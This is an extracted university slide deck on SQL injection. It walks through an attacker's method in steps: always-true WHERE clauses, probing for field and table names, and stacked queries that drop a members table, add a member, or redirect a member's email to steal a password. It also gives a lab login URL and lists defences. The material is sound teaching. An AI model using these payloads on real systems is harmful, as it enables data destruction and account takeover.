![Page 1: SQL Injection Attack - Syracuse University · 2006-09-27 · SQL Injection Attack Modus operandi... Sridhar.V.Iyer siyer02@syr.edu Department of Computer & Informations Sciences Syracuse](https://reader030.vdocument.in/reader030/viewer/2022040508/5e482d7ca8eff920da1f8728/html5/thumbnails/1.jpg)
SQL Injection AttackModus operandi. . .
Sridhar.V.Iyer
Department of Computer & Informations Sciences
Syracuse University, Syracuse, NY-13210
SQL Injection Attack – p. 1
![Page 2: SQL Injection Attack - Syracuse University · 2006-09-27 · SQL Injection Attack Modus operandi... Sridhar.V.Iyer siyer02@syr.edu Department of Computer & Informations Sciences Syracuse](https://reader030.vdocument.in/reader030/viewer/2022040508/5e482d7ca8eff920da1f8728/html5/thumbnails/2.jpg)
SQLWhat is SQL?
SQL Injection Attack – p. 2
![Page 3: SQL Injection Attack - Syracuse University · 2006-09-27 · SQL Injection Attack Modus operandi... Sridhar.V.Iyer siyer02@syr.edu Department of Computer & Informations Sciences Syracuse](https://reader030.vdocument.in/reader030/viewer/2022040508/5e482d7ca8eff920da1f8728/html5/thumbnails/3.jpg)
SQLWhat is SQL?
Where is it used?
SQL Injection Attack – p. 2
![Page 4: SQL Injection Attack - Syracuse University · 2006-09-27 · SQL Injection Attack Modus operandi... Sridhar.V.Iyer siyer02@syr.edu Department of Computer & Informations Sciences Syracuse](https://reader030.vdocument.in/reader030/viewer/2022040508/5e482d7ca8eff920da1f8728/html5/thumbnails/4.jpg)
SQLWhat is SQL?
Where is it used?
Why do we use it?
SQL Injection Attack – p. 2
![Page 5: SQL Injection Attack - Syracuse University · 2006-09-27 · SQL Injection Attack Modus operandi... Sridhar.V.Iyer siyer02@syr.edu Department of Computer & Informations Sciences Syracuse](https://reader030.vdocument.in/reader030/viewer/2022040508/5e482d7ca8eff920da1f8728/html5/thumbnails/5.jpg)
Web Technologies
Platform: Linux, OpenBSD, FreeBSD, Solarisand . . . Windows.
SQL Injection Attack – p. 3
![Page 6: SQL Injection Attack - Syracuse University · 2006-09-27 · SQL Injection Attack Modus operandi... Sridhar.V.Iyer siyer02@syr.edu Department of Computer & Informations Sciences Syracuse](https://reader030.vdocument.in/reader030/viewer/2022040508/5e482d7ca8eff920da1f8728/html5/thumbnails/6.jpg)
Web Technologies
Platform: Linux, OpenBSD, FreeBSD, Solarisand . . . Windows.
Web Servers: Apache, LightTPD, Yaws, Tux,IIS
SQL Injection Attack – p. 3
![Page 7: SQL Injection Attack - Syracuse University · 2006-09-27 · SQL Injection Attack Modus operandi... Sridhar.V.Iyer siyer02@syr.edu Department of Computer & Informations Sciences Syracuse](https://reader030.vdocument.in/reader030/viewer/2022040508/5e482d7ca8eff920da1f8728/html5/thumbnails/7.jpg)
Web Technologies
Platform: Linux, OpenBSD, FreeBSD, Solarisand . . . Windows.
Web Servers: Apache, LightTPD, Yaws, Tux,IIS
Databases: MySQL, PostgreSQL, Firebird,MSSQL server
SQL Injection Attack – p. 3
![Page 8: SQL Injection Attack - Syracuse University · 2006-09-27 · SQL Injection Attack Modus operandi... Sridhar.V.Iyer siyer02@syr.edu Department of Computer & Informations Sciences Syracuse](https://reader030.vdocument.in/reader030/viewer/2022040508/5e482d7ca8eff920da1f8728/html5/thumbnails/8.jpg)
Web Technologies
Platform: Linux, OpenBSD, FreeBSD, Solarisand . . . Windows.
Web Servers: Apache, LightTPD, Yaws, Tux,IIS
Databases: MySQL, PostgreSQL, Firebird,MSSQL server
Scripting Languages: Php, CGI/Perl,SmallTalk, ASP.NET
SQL Injection Attack – p. 3
![Page 9: SQL Injection Attack - Syracuse University · 2006-09-27 · SQL Injection Attack Modus operandi... Sridhar.V.Iyer siyer02@syr.edu Department of Computer & Informations Sciences Syracuse](https://reader030.vdocument.in/reader030/viewer/2022040508/5e482d7ca8eff920da1f8728/html5/thumbnails/9.jpg)
Web Technologies
Platform: Linux, OpenBSD, FreeBSD, Solarisand . . . Windows.
Web Servers: Apache, LightTPD, Yaws, Tux,IIS
Databases: MySQL, PostgreSQL, Firebird,MSSQL server
Scripting Languages: Php, CGI/Perl,SmallTalk, ASP.NET
Other Alternatives: J2EE/JSP etc.
SQL Injection Attack – p. 3
![Page 10: SQL Injection Attack - Syracuse University · 2006-09-27 · SQL Injection Attack Modus operandi... Sridhar.V.Iyer siyer02@syr.edu Department of Computer & Informations Sciences Syracuse](https://reader030.vdocument.in/reader030/viewer/2022040508/5e482d7ca8eff920da1f8728/html5/thumbnails/10.jpg)
Modus Operandi...Steve Friedl’s way
Know your enemy
SQL Injection Attack – p. 4
![Page 11: SQL Injection Attack - Syracuse University · 2006-09-27 · SQL Injection Attack Modus operandi... Sridhar.V.Iyer siyer02@syr.edu Department of Computer & Informations Sciences Syracuse](https://reader030.vdocument.in/reader030/viewer/2022040508/5e482d7ca8eff920da1f8728/html5/thumbnails/11.jpg)
Modus Operandi...Steve Friedl’s way
Know your enemy
Find his/her weakness
SQL Injection Attack – p. 4
![Page 12: SQL Injection Attack - Syracuse University · 2006-09-27 · SQL Injection Attack Modus operandi... Sridhar.V.Iyer siyer02@syr.edu Department of Computer & Informations Sciences Syracuse](https://reader030.vdocument.in/reader030/viewer/2022040508/5e482d7ca8eff920da1f8728/html5/thumbnails/12.jpg)
Modus Operandi...Steve Friedl’s way
Know your enemy
Find his/her weakness
Attack his/her weakness
SQL Injection Attack – p. 4
![Page 13: SQL Injection Attack - Syracuse University · 2006-09-27 · SQL Injection Attack Modus operandi... Sridhar.V.Iyer siyer02@syr.edu Department of Computer & Informations Sciences Syracuse](https://reader030.vdocument.in/reader030/viewer/2022040508/5e482d7ca8eff920da1f8728/html5/thumbnails/13.jpg)
Modus Operandi...Steve Friedl’s way
Know your enemy
Find his/her weakness
Attack his/her weakness
SQL Injection Attack – p. 4
![Page 14: SQL Injection Attack - Syracuse University · 2006-09-27 · SQL Injection Attack Modus operandi... Sridhar.V.Iyer siyer02@syr.edu Department of Computer & Informations Sciences Syracuse](https://reader030.vdocument.in/reader030/viewer/2022040508/5e482d7ca8eff920da1f8728/html5/thumbnails/14.jpg)
Anatomy of theAttack
The constructed SQL should be like
SELECT list FROM table WHERE field=’$EMAIL’;
SQL Injection Attack – p. 5
![Page 15: SQL Injection Attack - Syracuse University · 2006-09-27 · SQL Injection Attack Modus operandi... Sridhar.V.Iyer siyer02@syr.edu Department of Computer & Informations Sciences Syracuse](https://reader030.vdocument.in/reader030/viewer/2022040508/5e482d7ca8eff920da1f8728/html5/thumbnails/15.jpg)
Anatomy of theAttack
The constructed SQL should be like
SELECT list FROM table WHERE field=’$EMAIL’;
What if I give my own email and complete the
query for form?
SELECT list FROM table WHERE field=’[email protected]’’;
SQL Injection Attack – p. 5
![Page 16: SQL Injection Attack - Syracuse University · 2006-09-27 · SQL Injection Attack Modus operandi... Sridhar.V.Iyer siyer02@syr.edu Department of Computer & Informations Sciences Syracuse](https://reader030.vdocument.in/reader030/viewer/2022040508/5e482d7ca8eff920da1f8728/html5/thumbnails/16.jpg)
Anatomy of theAttack
The constructed SQL should be like
SELECT list FROM table WHERE field=’$EMAIL’;
What if I give my own email and complete the
query for form?
SELECT list FROM table WHERE field=’[email protected]’’;
What is the output?
SQL Injection Attack – p. 5
![Page 17: SQL Injection Attack - Syracuse University · 2006-09-27 · SQL Injection Attack Modus operandi... Sridhar.V.Iyer siyer02@syr.edu Department of Computer & Informations Sciences Syracuse](https://reader030.vdocument.in/reader030/viewer/2022040508/5e482d7ca8eff920da1f8728/html5/thumbnails/17.jpg)
Lets dig deeper. . .
Lets create a valid query
SELECT list FROM table WHERE field=’something’ or ’x’=’x’;
SQL Injection Attack – p. 6
![Page 18: SQL Injection Attack - Syracuse University · 2006-09-27 · SQL Injection Attack Modus operandi... Sridhar.V.Iyer siyer02@syr.edu Department of Computer & Informations Sciences Syracuse](https://reader030.vdocument.in/reader030/viewer/2022040508/5e482d7ca8eff920da1f8728/html5/thumbnails/18.jpg)
Lets dig deeper. . .
Lets create a valid query
SELECT list FROM table WHERE field=’something’ or ’x’=’x’;
Result?Your login information has been mailed to
Dont recognize that email address
Server error!!
SQL Injection Attack – p. 6
![Page 19: SQL Injection Attack - Syracuse University · 2006-09-27 · SQL Injection Attack Modus operandi... Sridhar.V.Iyer siyer02@syr.edu Department of Computer & Informations Sciences Syracuse](https://reader030.vdocument.in/reader030/viewer/2022040508/5e482d7ca8eff920da1f8728/html5/thumbnails/19.jpg)
Lets behaveourselves
Schema field mapping: Figure out the
tentative field list
SELECT list FROM table WHERE field=’x’ AND email IS NULL;–’;
SQL Injection Attack – p. 7
![Page 20: SQL Injection Attack - Syracuse University · 2006-09-27 · SQL Injection Attack Modus operandi... Sridhar.V.Iyer siyer02@syr.edu Department of Computer & Informations Sciences Syracuse](https://reader030.vdocument.in/reader030/viewer/2022040508/5e482d7ca8eff920da1f8728/html5/thumbnails/20.jpg)
Lets behaveourselves
Schema field mapping: Figure out the
tentative field list
SELECT list FROM table WHERE field=’x’ AND email IS NULL;–’;
Find out as many fields as possible in a
similar fashion.
SQL Injection Attack – p. 7
![Page 21: SQL Injection Attack - Syracuse University · 2006-09-27 · SQL Injection Attack Modus operandi... Sridhar.V.Iyer siyer02@syr.edu Department of Computer & Informations Sciences Syracuse](https://reader030.vdocument.in/reader030/viewer/2022040508/5e482d7ca8eff920da1f8728/html5/thumbnails/21.jpg)
Lets behaveourselves
Schema field mapping: Figure out the
tentative field list
SELECT list FROM table WHERE field=’x’ AND email IS NULL;–’;
Find out as many fields as possible in a
similar fashion.
Find out the table name. How?
SQL Injection Attack – p. 7
![Page 22: SQL Injection Attack - Syracuse University · 2006-09-27 · SQL Injection Attack Modus operandi... Sridhar.V.Iyer siyer02@syr.edu Department of Computer & Informations Sciences Syracuse](https://reader030.vdocument.in/reader030/viewer/2022040508/5e482d7ca8eff920da1f8728/html5/thumbnails/22.jpg)
Lets behaveourselves
We can try the query SELECT COUNT(*) FROM tablename;
SELECT . . . email=’x’ AND 1=(SELECT COUNT(*) FROM tablename);–’;
SQL Injection Attack – p. 8
![Page 23: SQL Injection Attack - Syracuse University · 2006-09-27 · SQL Injection Attack Modus operandi... Sridhar.V.Iyer siyer02@syr.edu Department of Computer & Informations Sciences Syracuse](https://reader030.vdocument.in/reader030/viewer/2022040508/5e482d7ca8eff920da1f8728/html5/thumbnails/23.jpg)
Lets behaveourselves
We can try the query SELECT COUNT(*) FROM tablename;
SELECT . . . email=’x’ AND 1=(SELECT COUNT(*) FROM tablename);–’;
Again educated guess is required. The sites
wont have cryptic table names.
SQL Injection Attack – p. 8
![Page 24: SQL Injection Attack - Syracuse University · 2006-09-27 · SQL Injection Attack Modus operandi... Sridhar.V.Iyer siyer02@syr.edu Department of Computer & Informations Sciences Syracuse](https://reader030.vdocument.in/reader030/viewer/2022040508/5e482d7ca8eff920da1f8728/html5/thumbnails/24.jpg)
Lets behaveourselves
We can try the query SELECT COUNT(*) FROM tablename;
SELECT . . . email=’x’ AND 1=(SELECT COUNT(*) FROM tablename);–’;
Again educated guess is required. The sites
wont have cryptic table names.
Are we interested in this table?SELECT list FROM table WHERE field=’x’ AND members.email IS NULL;–’;
SQL Injection Attack – p. 8
![Page 25: SQL Injection Attack - Syracuse University · 2006-09-27 · SQL Injection Attack Modus operandi... Sridhar.V.Iyer siyer02@syr.edu Department of Computer & Informations Sciences Syracuse](https://reader030.vdocument.in/reader030/viewer/2022040508/5e482d7ca8eff920da1f8728/html5/thumbnails/25.jpg)
If the databasewasn’t readonly??
Bazoooooka
SELECT . . . =’x’; DROP TABLE members;–’;
SQL Injection Attack – p. 9
![Page 26: SQL Injection Attack - Syracuse University · 2006-09-27 · SQL Injection Attack Modus operandi... Sridhar.V.Iyer siyer02@syr.edu Department of Computer & Informations Sciences Syracuse](https://reader030.vdocument.in/reader030/viewer/2022040508/5e482d7ca8eff920da1f8728/html5/thumbnails/26.jpg)
If the databasewasn’t readonly??
Bazoooooka
SELECT . . . =’x’; DROP TABLE members;–’;
Add a new member
SELECT . . . =’x’; INSERT INTO members{. . . } VALUES {. . . };–’;
SQL Injection Attack – p. 9
![Page 27: SQL Injection Attack - Syracuse University · 2006-09-27 · SQL Injection Attack Modus operandi... Sridhar.V.Iyer siyer02@syr.edu Department of Computer & Informations Sciences Syracuse](https://reader030.vdocument.in/reader030/viewer/2022040508/5e482d7ca8eff920da1f8728/html5/thumbnails/27.jpg)
If the databasewasn’t readonly??
Bazoooooka
SELECT . . . =’x’; DROP TABLE members;–’;
Add a new member
SELECT . . . =’x’; INSERT INTO members{. . . } VALUES {. . . };–’;
Mail me the passwordSELECT . . . =’x’; UPDATE members
SET [email protected] WHERE [email protected]’;
SQL Injection Attack – p. 9
![Page 28: SQL Injection Attack - Syracuse University · 2006-09-27 · SQL Injection Attack Modus operandi... Sridhar.V.Iyer siyer02@syr.edu Department of Computer & Informations Sciences Syracuse](https://reader030.vdocument.in/reader030/viewer/2022040508/5e482d7ca8eff920da1f8728/html5/thumbnails/28.jpg)
Other MethodsUse xp_cmdshell: Something like Macro forMS Word
Map Database structure: Do more of the stuffwe already discussed for just one form
SQL Injection Attack – p. 10
![Page 29: SQL Injection Attack - Syracuse University · 2006-09-27 · SQL Injection Attack Modus operandi... Sridhar.V.Iyer siyer02@syr.edu Department of Computer & Informations Sciences Syracuse](https://reader030.vdocument.in/reader030/viewer/2022040508/5e482d7ca8eff920da1f8728/html5/thumbnails/29.jpg)
Time for some actionhttp://128.230.212.170/apache2-default/login.php
SQL Injection Attack – p. 11
![Page 30: SQL Injection Attack - Syracuse University · 2006-09-27 · SQL Injection Attack Modus operandi... Sridhar.V.Iyer siyer02@syr.edu Department of Computer & Informations Sciences Syracuse](https://reader030.vdocument.in/reader030/viewer/2022040508/5e482d7ca8eff920da1f8728/html5/thumbnails/30.jpg)
How not to do thewrong thing
Sanitize the Input
SQL Injection Attack – p. 12
![Page 31: SQL Injection Attack - Syracuse University · 2006-09-27 · SQL Injection Attack Modus operandi... Sridhar.V.Iyer siyer02@syr.edu Department of Computer & Informations Sciences Syracuse](https://reader030.vdocument.in/reader030/viewer/2022040508/5e482d7ca8eff920da1f8728/html5/thumbnails/31.jpg)
How not to do thewrong thing
Sanitize the Input
Quotesafe the Input
SQL Injection Attack – p. 12
![Page 32: SQL Injection Attack - Syracuse University · 2006-09-27 · SQL Injection Attack Modus operandi... Sridhar.V.Iyer siyer02@syr.edu Department of Computer & Informations Sciences Syracuse](https://reader030.vdocument.in/reader030/viewer/2022040508/5e482d7ca8eff920da1f8728/html5/thumbnails/32.jpg)
How not to do thewrong thing
Sanitize the Input
Quotesafe the Input
Use bounded parameters
SQL Injection Attack – p. 12
![Page 33: SQL Injection Attack - Syracuse University · 2006-09-27 · SQL Injection Attack Modus operandi... Sridhar.V.Iyer siyer02@syr.edu Department of Computer & Informations Sciences Syracuse](https://reader030.vdocument.in/reader030/viewer/2022040508/5e482d7ca8eff920da1f8728/html5/thumbnails/33.jpg)
How not to do thewrong thing
Sanitize the Input
Quotesafe the Input
Use bounded parameters
Limit Database Permission and segregateusers
SQL Injection Attack – p. 12
![Page 34: SQL Injection Attack - Syracuse University · 2006-09-27 · SQL Injection Attack Modus operandi... Sridhar.V.Iyer siyer02@syr.edu Department of Computer & Informations Sciences Syracuse](https://reader030.vdocument.in/reader030/viewer/2022040508/5e482d7ca8eff920da1f8728/html5/thumbnails/34.jpg)
How not to do thewrong thing
Sanitize the Input
Quotesafe the Input
Use bounded parameters
Limit Database Permission and segregateusers
Use Stored procedures for database access
SQL Injection Attack – p. 12
![Page 35: SQL Injection Attack - Syracuse University · 2006-09-27 · SQL Injection Attack Modus operandi... Sridhar.V.Iyer siyer02@syr.edu Department of Computer & Informations Sciences Syracuse](https://reader030.vdocument.in/reader030/viewer/2022040508/5e482d7ca8eff920da1f8728/html5/thumbnails/35.jpg)
How not to do thewrong thing
Sanitize the Input
Quotesafe the Input
Use bounded parameters
Limit Database Permission and segregateusers
Use Stored procedures for database access
Isolate the Webserver
SQL Injection Attack – p. 12
![Page 36: SQL Injection Attack - Syracuse University · 2006-09-27 · SQL Injection Attack Modus operandi... Sridhar.V.Iyer siyer02@syr.edu Department of Computer & Informations Sciences Syracuse](https://reader030.vdocument.in/reader030/viewer/2022040508/5e482d7ca8eff920da1f8728/html5/thumbnails/36.jpg)
How not to do thewrong thing
Sanitize the Input
Quotesafe the Input
Use bounded parameters
Limit Database Permission and segregateusers
Use Stored procedures for database access
Isolate the Webserver
Configure Error Reporting
SQL Injection Attack – p. 12
![Page 37: SQL Injection Attack - Syracuse University · 2006-09-27 · SQL Injection Attack Modus operandi... Sridhar.V.Iyer siyer02@syr.edu Department of Computer & Informations Sciences Syracuse](https://reader030.vdocument.in/reader030/viewer/2022040508/5e482d7ca8eff920da1f8728/html5/thumbnails/37.jpg)
DISCLAIMERAny actual or imagined resemblance to ourfar more civilized world today is unintentionaland purely coincidental
The purpose of this presentation is purelyeducational
SQL Injection Attack – p. 13
![Page 38: SQL Injection Attack - Syracuse University · 2006-09-27 · SQL Injection Attack Modus operandi... Sridhar.V.Iyer siyer02@syr.edu Department of Computer & Informations Sciences Syracuse](https://reader030.vdocument.in/reader030/viewer/2022040508/5e482d7ca8eff920da1f8728/html5/thumbnails/38.jpg)
Referencehttp://www.unixwiz.net/techtips/sql-injection.html
Php Manual.
MySQL Manual.
Google. . . ofcourse.
This site has been created using prosperpackage on LATEX
SQL Injection Attack – p. 14
![Page 39: SQL Injection Attack - Syracuse University · 2006-09-27 · SQL Injection Attack Modus operandi... Sridhar.V.Iyer siyer02@syr.edu Department of Computer & Informations Sciences Syracuse](https://reader030.vdocument.in/reader030/viewer/2022040508/5e482d7ca8eff920da1f8728/html5/thumbnails/39.jpg)
ThanksQuestions?
SQL Injection Attack – p. 15